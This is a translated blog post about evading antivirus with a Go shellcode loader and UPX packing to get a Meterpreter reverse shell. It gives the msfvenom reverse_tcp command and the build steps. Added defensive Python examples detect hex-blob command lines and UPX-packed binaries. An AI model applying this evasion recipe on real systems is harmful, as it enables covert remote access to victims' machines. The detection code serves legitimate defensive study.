Bypass AV with golang
2022-07-03 00:15:00 【Lomi only bear】
In this article I will describe in detail a neat trick for bypassing most anti-virus products to obtain a Meterpreter reverse shell.
It all started when I compiled a Go repository from GitHub that injects shellcode into a running process:
https://github.com/brimstone/go-shellcode
Simply generating a payload with msfvenom and testing it showed that Windows Defender detects this payload easily. The Meterpreter payload was generated as follows:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxxx LPORT=xxx -b \x00 -f hex
The advantage of using Go for this experiment is that you can cross-compile on a Linux host for the target Windows host. The command to compile the application is:
GOOS=windows GOARCH=amd64 go build
This produces a Go .exe that takes the shellcode the attacker wants to inject as a command-line argument.
This is easy to detect; Windows Defender has no trouble identifying it as Meterpreter. For a quick and easy bypass we tried packing the executable with UPX in brute-force mode, which compressed it 8 times. Windows Defender caught it again, so no luck there.
Running the Go exe with the shellcode as a parameter:
As expected, Windows Defender detected it easily. We then tried UPX-compressing the sc.exe file, which also failed.
Of course, once Windows Defender detects the process, it kills the Meterpreter session.
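The loader described above receives its payload as a hex string on the command line, which is exactly the kind of thing process-creation telemetry (Sysmon event 1, EDR command-line logging) exposes. The following is an added detection example written for this page; it is not code from the original post or from the go-shellcode project. The log lines in SAMPLE_LOG are constructed, the field layout (ProcessId=, Image=, CommandLine="...") is an assumption about the log format, and the hex blob is filler, not shellcode.

```python
import re

# Constructed process-creation log lines (not real telemetry): a benign process,
# a benign process carrying a legitimate 40-hex-char certificate thumbprint, and
# a loader invoked with a long hex blob on its command line. The blob is
# "deadbeef" repeated, i.e. filler rather than real shellcode.
SAMPLE_LOG = [
    'ProcessId=4120 Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe C:\\notes.txt"',
    'ProcessId=5212 Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil -verify -urlfetch '
    'a4b1c2d3e4f5061728394a5b6c7d8e9f00112233"',
    'ProcessId=6104 Image=C:\\Users\\lab\\sc.exe CommandLine="sc.exe ' + "deadbeef" * 40 + '"',
]

# Any run of 16 or more hex digits is a candidate; the length threshold decides.
HEX_RUN = re.compile(r"[0-9a-fA-F]{16,}")
CMDLINE = re.compile(r'CommandLine="([^"]*)"')


def longest_hex_run(cmdline: str) -> int:
    """Length of the longest contiguous run of hex digits in a command line (0 if none >= 16)."""
    return max((len(m.group(0)) for m in HEX_RUN.finditer(cmdline)), default=0)


def flag_hex_blob_cmdlines(lines, threshold: int = 128):
    """Return (pid, image, hex_run_length) for every line whose command line carries a
    contiguous hex run of at least `threshold` characters.

    128 hex characters is 64 bytes of payload: comfortably above MD5/SHA-1/SHA-256
    hashes (32/40/64 chars), GUIDs and thumbprints, so ordinary admin tooling stays
    below the line while even a minimal injected stub lands well above it.
    """
    hits = []
    for line in lines:
        m = CMDLINE.search(line)
        if not m:
            continue
        run = longest_hex_run(m.group(1))
        if run >= threshold:
            pid = re.search(r"ProcessId=(\d+)", line).group(1)
            image = re.search(r"Image=(\S+)", line).group(1)
            hits.append((pid, image, run))
    return hits


if __name__ == "__main__":
    for pid, image, run in flag_hex_blob_cmdlines(SAMPLE_LOG):
        print(f"suspicious: pid={pid} image={image} hex_run={run} chars")
```

The hex-run length is the only signal here, so the same idea should be paired with a base64 check (the other common way to smuggle a blob through argv) and with the parent-process context; a long hex argument to an unsigned binary in a user-writable path is a much stronger lead than the same argument to a signed installer.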
From here we reviewed the source code of the Go program. After the review we found that the main.go source file could be modified to hold the shellcode in a variable before compiling, instead of compiling the .exe and then passing the shellcode as a command-line argument.
[Screenshot: original go-shellcode/cmd/sc/main.go source]
[Screenshot: modified go-shellcode/cmd/sc/main.go source]
Here the reference to the command-line argument is replaced by the declared variable.
Using these files, two .exe files were compiled: one to test without UPX compression and the other to test with UPX compression. On touching disk, the uncompressed version was detected immediately, but the UPX-compressed .exe was not detected by static analysis.
Windows Defender immediately detected that the non-UPX-compressed .exe contained the Meterpreter payload.
However, running the custom UPX-compressed .exe succeeded and gave a reverse shell.
The UPX-compressed Go exe ran successfully and returned a reverse shell from the victim's machine.
Next we ran it through VirusTotal (VT) to check its detection rate.
The UPX-compressed Go exe was uploaded to VirusTotal. Only Cybereason and Cylance detected the file as malicious.
Only two anti-virus engines found a malicious payload in this file, and neither of them specified what was malicious about the upload, only that it was malicious. The UPX compression itself may be the cause of the alert, since UPX compression can be used to obfuscate malicious files.
Brute-force UPX compression of the exe, which compressed the file 8 times.
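The post's own VirusTotal result, where only two engines fired and UPX itself was the likely trigger, shows what a defender can still see when the payload is hidden inside a packed binary: the packing. Below is an added triage example written for this page (not code from the original post, from UPX or from the go-shellcode project) that reads the PE section table and flags the section names a stock UPX build leaves behind, plus a byte-entropy helper for the case where those names have been changed. build_min_pe builds constructed, header-only PE images for the demonstration; they are not runnable programs, and the layout they use (DOS stub, PE signature, COFF header, PE32+ optional header, 40-byte section headers) is the standard PE format.

```python
import math
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for compressed or encrypted data, lower for ordinary code."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_section_names(data: bytes) -> list:
    """Return the section names from a PE image's section table, in table order."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER starts here
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    names = []
    for i in range(num_sections):
        raw = data[table + 40 * i: table + 40 * i + 8]    # Name is the first 8 bytes
        names.append(raw.rstrip(b"\x00").decode("ascii", "replace"))
    return names


def looks_upx_packed(data: bytes) -> bool:
    """Stock UPX rewrites the section table to UPX0/UPX1 (and sometimes UPX2 or .rsrc)."""
    return any(name.upper().startswith("UPX") for name in pe_section_names(data))


def build_min_pe(section_names) -> bytes:
    """Constructed header-only PE32+ image for the demo: enough structure for the parser
    above, no code, not loadable. Layout follows the public PE specification."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xF0  # size of a PE32+ optional header with 16 data directories
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, opt_size, 0x22)
    opt = struct.pack("<H", 0x20B) + b"\x00" * (opt_size - 2)   # PE32+ magic, rest zeroed
    table = b""
    for name in section_names:
        table += name.encode("ascii")[:8].ljust(8, b"\x00") + b"\x00" * 32
    return dos + b"PE\x00\x00" + coff + opt + table


# Constructed samples: what a stock UPX output and an unpacked Go build look like.
UPX_LIKE = build_min_pe(["UPX0", "UPX1", ".rsrc"])
NORMAL = build_min_pe([".text", ".rdata", ".data", ".pdata"])


if __name__ == "__main__":
    for label, image in (("upx-like", UPX_LIKE), ("normal", NORMAL)):
        print(label, pe_section_names(image), "upx_packed=%s" % looks_upx_packed(image))
```

The section-name check is cheap and exactly what the two engines in the post most likely keyed on, but it is only a triage indicator: UPX section names can be renamed, so in practice it is combined with per-section entropy (a near-8.0 section that is also executable, as in UPX1, is the telling pattern) and with the oddly thin import table a packer stub leaves behind. The post's result is the other half of the lesson for defenders: the packing hid the Meterpreter payload from static scanning, but it did not hide the fact that the file was packed.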
Translated from the original article:
https://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher-it/
Reference articles:
https://github.com/brimstone/go-shellcode
https://boyter.org/posts/trimming-golang-binary-fat/
https://blog.filippo.io/shrink-your-go-binaries-with-this-one-weird-trick/